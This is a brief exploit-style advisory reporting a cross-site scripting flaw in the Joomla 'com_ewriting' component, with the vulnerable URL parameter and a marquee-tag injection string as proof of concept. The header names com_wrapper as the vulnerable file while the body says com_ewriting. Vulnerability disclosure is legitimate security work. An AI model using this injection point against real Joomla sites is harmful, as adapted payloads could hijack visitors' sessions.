The Joomla EWriting component suffers from a cross site scripting vulnerability.
b0cbc36bb25288d02b019c76fd7c07d44954053ac3c4c5ec7a9116d986bf13fe
# Cross Site Scripting on Joomla "com_ewriting"
# Risk: Low
# CWE number: CWE-79
# Date: 14/04/2014
# Project: www.joomla.org
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on Windows 8 pro
# Vulnerable File: index.php?option=com_wrapper&itemid=
# Exploit:
-Target: http://site.com
-Vuln. file: /index.php?option=com_ewriting&itemid=
-Exploit: "><marquee>Vulnerable</marquee>